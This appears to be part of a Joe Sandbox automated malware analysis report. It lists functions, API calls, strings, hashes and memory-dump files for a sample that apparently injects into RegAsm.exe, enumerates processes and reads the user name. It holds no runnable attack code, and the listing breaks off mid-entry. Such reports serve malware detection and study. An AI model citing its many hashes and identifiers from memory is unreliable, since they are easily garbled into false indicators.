Opcode ID: 032a20b2719aeac93f981678fa7356fabd03005f9664698b0c146171a4c3c5a0
Instruction ID: a1a3c5ffdeec0d868062534fdf646057d93e4599d519cbd3308dfba0cbc4786a
Opcode Fuzzy Hash: 032a20b2719aeac93f981678fa7356fabd03005f9664698b0c146171a4c3c5a0
Instruction Fuzzy Hash: 48618B75D00208ABCF09EFE4C845AEDBBB5FF49304F20851EE406AB295EB399955CF54

Function 004C702E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004C7191

Strings

-, xrefs: 004C71BF
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 004C70EF, 004C7126, 004C712B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: 3df807641978341e3459b6681c8216d1387fe83955a82d5e30e5632bcfe20356
Instruction ID: f28ebc7ca895bfe019caabb9801834997c180ab27af000195aecfd913d65c7ec
Opcode Fuzzy Hash: 3df807641978341e3459b6681c8216d1387fe83955a82d5e30e5632bcfe20356
Instruction Fuzzy Hash: 4751E538A082499FCF658E6A8881FBFBFF56F06310F18806FE49197341DA788941CF59

Function 004A1BA5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004A1BAC

Strings

Madino Mino, xrefs: 004A1BBF
XO, xrefs: 004A1C83, 004A1CB1

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch
String ID: Madino Mino$XO
API String ID: 3886170330-1603853466
Opcode ID: 6ebcd623581b8827d924ac7da745c38b5a2c802891672f4bf068326750e6ef44
Instruction ID: cf0391e49bf7b9251475df3c397b7420badff6a62a84542803274724e213cba7
Opcode Fuzzy Hash: 6ebcd623581b8827d924ac7da745c38b5a2c802891672f4bf068326750e6ef44
Instruction Fuzzy Hash: F741F430A002188FDB24DB59C9D497D77B2BF5A734F28424BE1189B3E2E7759C42CB58

Function 004CD500 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 004CD53F
__IsNonwritableInCurrentImage.LIBCMT ref: 004CD5F3

Strings

csm, xrefs: 004CD5DD

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 143f07e421ded90d79530b19347f11caeae3b3813e9abccd79acd3b8522c9ba2
Instruction ID: 5a2babbc7a9aa4c7bf42ad4680492944a5d94668b64f0cbdbcbc6a9bcf7c3c0e
Opcode Fuzzy Hash: 143f07e421ded90d79530b19347f11caeae3b3813e9abccd79acd3b8522c9ba2
Instruction Fuzzy Hash: 4441B338E00218ABCF50DF69C885F9EBBB1AF45318F14806EE8195B392D739E915CF94

Function 004CE0DB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 004CE100

Strings

RCC, xrefs: 004CE11A
MOC, xrefs: 004CE112

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 74f0f3d03a7d92b0b5cb8caa1c6f267413a138e29cd112b9fd3ed473c6c6baae
Instruction ID: 53a17860ef5994f0de85d0d6c6501c8882b97ff36246f4aa276f2593958ef59b
Opcode Fuzzy Hash: 74f0f3d03a7d92b0b5cb8caa1c6f267413a138e29cd112b9fd3ed473c6c6baae
Instruction Fuzzy Hash: 72418876A00209AFCF56CF99CD81FAEBBB5BF08304F18409EF904A6251D7399960DB94

Function 004C0276 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004C027D

Part of subcall function 004B4DDD: __EH_prolog3.LIBCMT ref: 004B4DE4
Part of subcall function 004B4DDD: std::_Lockit::_Lockit.LIBCPMT ref: 004B4DEE
Part of subcall function 004B4DDD: int.LIBCPMT ref: 004B4E05

Strings

0123456789-, xrefs: 004C02C8
0123456789-, xrefs: 004C02CD

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3H_prolog3_LockitLockit::_std::_
String ID: 0123456789-$0123456789-
API String ID: 79917597-2494171821
Opcode ID: 100e290b952c38a232eb3268d7d1671960d3c25a208d8ceedac0c50c650d041e
Instruction ID: 31973a04c21c2b7d9d7685cccbaa028ca131396b2da1fe784c412c04888c014d
Opcode Fuzzy Hash: 100e290b952c38a232eb3268d7d1671960d3c25a208d8ceedac0c50c650d041e
Instruction Fuzzy Hash: 5B417B35900158DFCF55EFA8C881EEEBBB5BF08318F10005EE811AB261DB389E56CB58

Function 004C656A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004C6571

Part of subcall function 004A3037: __EH_prolog3.LIBCMT ref: 004A303E
Part of subcall function 004A3037: std::_Lockit::_Lockit.LIBCPMT ref: 004A3048
Part of subcall function 004A3037: int.LIBCPMT ref: 004A305F
Part of subcall function 004A3037: std::_Lockit::~_Lockit.LIBCPMT ref: 004A30B9

Strings

0123456789-, xrefs: 004C65BC
0123456789-, xrefs: 004C65C1

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789-$0123456789-
API String ID: 2728201062-2494171821
Opcode ID: dccc30329fe571515762aa19f6fd51b06064761b4bd43c5b34efdb85629952f2
Instruction ID: 143ae7a9a6e4bee872f14f1306160dd3774b39e37d5dbe1461307881d143ed5e
Opcode Fuzzy Hash: dccc30329fe571515762aa19f6fd51b06064761b4bd43c5b34efdb85629952f2
Instruction Fuzzy Hash: 33418C35D00108AFCF55EFA4E991AAEBBB5BF19304F10406EF411AB251DA389E46CB49

Function 004BFF49 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004BFF50

Part of subcall function 004B4D48: __EH_prolog3.LIBCMT ref: 004B4D4F
Part of subcall function 004B4D48: std::_Lockit::_Lockit.LIBCPMT ref: 004B4D59
Part of subcall function 004B4D48: int.LIBCPMT ref: 004B4D70

Strings

0123456789-, xrefs: 004BFFA0
%.0Lf, xrefs: 004BFF9B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3H_prolog3_LockitLockit::_std::_
String ID: %.0Lf$0123456789-
API String ID: 79917597-3094241602
Opcode ID: 356ca8926d2221f000cbbb6da8570315a91407bdef953ec676924d090d476d70
Instruction ID: 98daaeb1c35ae2489566663a8552981c8f1d857dc801e9ea84ad8ce34966846e
Opcode Fuzzy Hash: 356ca8926d2221f000cbbb6da8570315a91407bdef953ec676924d090d476d70
Instruction Fuzzy Hash: 21414C35900119DFCF15EFA4D981DEEBBB5BF09318F10005EF815AB251DB389955CB68

Function 004D0A69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004D095C: Replicator::operator[].LIBCMT ref: 004D09C8

DName::DName.LIBVCRUNTIME ref: 004D0AB5
DName::operator+.LIBCMT ref: 004D0AFB

Strings

8`R, xrefs: 004D0B59, 004D0B66

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: NameName::Name::operator+Replicator::operator[]
String ID: 8`R
API String ID: 583996491-899757637
Opcode ID: 559336e7450c65a36698f8104dfc620d9f2b475b190370b14836293bac891b32
Instruction ID: 1fd361c0a5dd531d1f0bcc4f48895f9e232a217ea14b3404e1824b7a05067219
Opcode Fuzzy Hash: 559336e7450c65a36698f8104dfc620d9f2b475b190370b14836293bac891b32
Instruction Fuzzy Hash: CD3127B49042099FEB54CF98D869BBE7BF0BB05308F40405BD45A9B351C778AA09DF49

Function 004D1D9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004CF2EC: pDNameNode::pDNameNode.LIBCMT ref: 004CF312

DName::DName.LIBVCRUNTIME ref: 004D1E59
DName::operator+.LIBCMT ref: 004D1E67

Strings

8`R, xrefs: 004D1DEA

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name$Name::Name::operator+NodeNode::p
String ID: 8`R
API String ID: 3257498322-899757637
Opcode ID: 3c59fc68720802c6d38190a479e236a9378cf203b59514adf3074c5b435c7161
Instruction ID: 26120472339811a9d27067b5edf921d7617caa5bcdcf54373906a26d27fb4d1e
Opcode Fuzzy Hash: 3c59fc68720802c6d38190a479e236a9378cf203b59514adf3074c5b435c7161
Instruction Fuzzy Hash: ED213B79C00209BFDB04EF90D866AEE7BB9EB04304F50406FE90697361E7785A49DF95

Function 004D2779 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 004D2790
DName::DName.LIBVCRUNTIME ref: 004D2815

Strings

A, xrefs: 004D27F5

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: 0013818f552a4eafe4d4eb3c7165f556030a18291d10e640bb2ca41736885f5b
Instruction ID: f56673743a2777aeae51a000a10cb3abd88f7a780f729a64ad45d844b91c476a
Opcode Fuzzy Hash: 0013818f552a4eafe4d4eb3c7165f556030a18291d10e640bb2ca41736885f5b
Instruction Fuzzy Hash: A721B074904208EFDF20DF64C921BAD7B71FB28304F10806FE4055B351D7789A4AEB49

Function 004D3712 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 004D3727

Strings

D_R, xrefs: 004D3777, 004D3781

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: D_R
API String ID: 1333004437-815041869
Opcode ID: 5ed7aad5c6185634dcd9a25e35d013083093af717bd21f6cd9bd16a1735deb61
Instruction ID: 5e3398a94325930aee49d77b4d8b01d703ae91b13b47fdb908f38bcf8c5b5360
Opcode Fuzzy Hash: 5ed7aad5c6185634dcd9a25e35d013083093af717bd21f6cd9bd16a1735deb61
Instruction Fuzzy Hash: 992180B5800208AFEB10EF95D855FED7BB9AB04305F00409AF5069B382DB789A48CB95

Function 004D0E20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 004D0E63
DName::operator+=.LIBCMT ref: 004D0EA3

Strings

\aR, xrefs: 004D0EAB

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: NameName::Name::operator+=
String ID: \aR
API String ID: 2247604192-1667523832
Opcode ID: 11dc335d61b92aaaeb9449fa58f2060830201dcf3bb85243362f1d7ab5d24413
Instruction ID: 839354579c5e978883d382361bb93ae9961552c42d241f9f8474ca29ee9c7ec0
Opcode Fuzzy Hash: 11dc335d61b92aaaeb9449fa58f2060830201dcf3bb85243362f1d7ab5d24413
Instruction Fuzzy Hash: 1C117FB9800219ABDB04EFA5D855FEEBB78EF04304F00485FE41167381DB7C9749CA99

Function 004CF138 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 004CF155

Part of subcall function 004D5CFC: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 004D5D0C

swprintf.LIBCMT ref: 004CF178

Part of subcall function 004AAAC7: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004AAAD9

Strings

%lf, xrefs: 004CF14B, 004CF150, 004CF175

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
String ID: %lf
API String ID: 3672277462-2891890143
Opcode ID: 16c8e529cddc76182e20016a526f866ee048142d5e49ccd5fba9430cfec66d64
Instruction ID: ab991f93c6eec4da2029353239fe785fb51270c6dda1152cc1eaf3260132f7ba
Opcode Fuzzy Hash: 16c8e529cddc76182e20016a526f866ee048142d5e49ccd5fba9430cfec66d64
Instruction Fuzzy Hash: BFF0CDB5510008BAEB01AB86CC4AFBF7EBCEF85358F01409EFA8516281DB795E10D376

Function 004CF198 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 004CF1B1

Part of subcall function 004D5CFC: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 004D5D0C

swprintf.LIBCMT ref: 004CF1D4

Part of subcall function 004AAAC7: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004AAAD9

Strings

%lf, xrefs: 004CF1A7, 004CF1AC, 004CF1D1

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
String ID: %lf
API String ID: 3672277462-2891890143
Opcode ID: c6c699895d752f34f4268e1c1593bb920f2a9b6cb7f827c073e8b319ddab6de6
Instruction ID: 030719c665acf572df030bc2a16ec688ec1a0d8015ad3c495d1db3e68d92b32d
Opcode Fuzzy Hash: c6c699895d752f34f4268e1c1593bb920f2a9b6cb7f827c073e8b319ddab6de6
Instruction Fuzzy Hash: DEF0F0B5100008BAEB006B868C4AFBF7FACDF89358F01809EFA4506281DB399E00C375

Function 004AAE36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,004A69B1,?,00000000,00000000,?,004A68F9,?,?,?,?,004A647C,?,?), ref: 004AAE6E
GetSystemTimeAsFileTime.KERNEL32(?,9496FA04,?,?,0051F279,000000FF,?,004A69B1,?,00000000,00000000,?,004A68F9,?,?), ref: 004AAE72

Strings

|dJ, xrefs: 004AAE50, 004AAE78

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$Precise
String ID: |dJ
API String ID: 743729956-892489227
Opcode ID: ae7d0bcd9ad8a8d6007d2d4eb0fbcfc92ecf91bf35ee72d844bb7bed744a6ee8
Instruction ID: b64eab0cd1c27b036e487e782e992ebe8b2ba22e88341a539e0af2212924de38
Opcode Fuzzy Hash: ae7d0bcd9ad8a8d6007d2d4eb0fbcfc92ecf91bf35ee72d844bb7bed744a6ee8
Instruction Fuzzy Hash: FBF02B76A44654EFCB118F54DC09B5ABBA8FB29F10F000227E81297790DB386904DF84

Function 00510072 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00510072
GetCommandLineW.KERNEL32 ref: 0051007D

Strings

%, xrefs: 00510078

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: %
API String ID: 3253501508-2291192146
Opcode ID: 0629bdd03d4e1c695185b4b32c84b15a303c6e90e04d2142425dc1286c65da2f
Instruction ID: a733ca2dec47f960dda9d847f4041693ba00de3dd544464c40b6c0e8b80aaa49
Opcode Fuzzy Hash: 0629bdd03d4e1c695185b4b32c84b15a303c6e90e04d2142425dc1286c65da2f
Instruction Fuzzy Hash: A2B048788003408F87108F28B8280043EB0BB2A3023C08466D801D2230E739611AEB00

Analysis Process: RegAsm.exePID: 408, Parent PID: 4288COMMON

Execution Graph

Execution Coverage:	25%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.7%
Total number of Nodes:	1532
Total number of Limit Nodes:	4

Executed Functions

Function 00414DD0 Relevance: 6.1, APIs: 4, Instructions: 60
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0041D28A), ref: 00414DF7
Process32First.KERNEL32(00000000,00000128), ref: 00414E0B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E20
FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E8E

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 339029e576995a2f4615998ce65479dbd3c5ebd590c36b7bf1f44c226f21ad39
Instruction ID: f077dbc1a325593507dfc795214ecfd57d01e7b053a503fe43932f4ef366c8a4
Opcode Fuzzy Hash: 339029e576995a2f4615998ce65479dbd3c5ebd590c36b7bf1f44c226f21ad39
Instruction Fuzzy Hash: 5F210B719006189BCB24EF51EC95BDEB379AF54304F5041DEA50AA6190DF38ABC5CF94

Function 00414560 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041460F

Strings

/ , xrefs: 0041462C

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: /
API String ID: 2299586839-4001269591
Opcode ID: d9e5c8350234ed05bbaf55680988dfbc2de00dbdffab6cb1503c50a65ba4f0a2
Instruction ID: 5766e8fd181ccb4bcbae14092d34263f2fb559dd155eb9d852ce37c304b9c71e
Opcode Fuzzy Hash: d9e5c8350234ed05bbaf55680988dfbc2de00dbdffab6cb1503c50a65ba4f0a2
Instruction Fuzzy Hash: F4415875940228ABCB24EF50DC89BEDB375BF84308F2081DAA10A67191DB786FC5CF54

Function 004143B0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,00000104), ref: 004143DC

Memory Dump Source

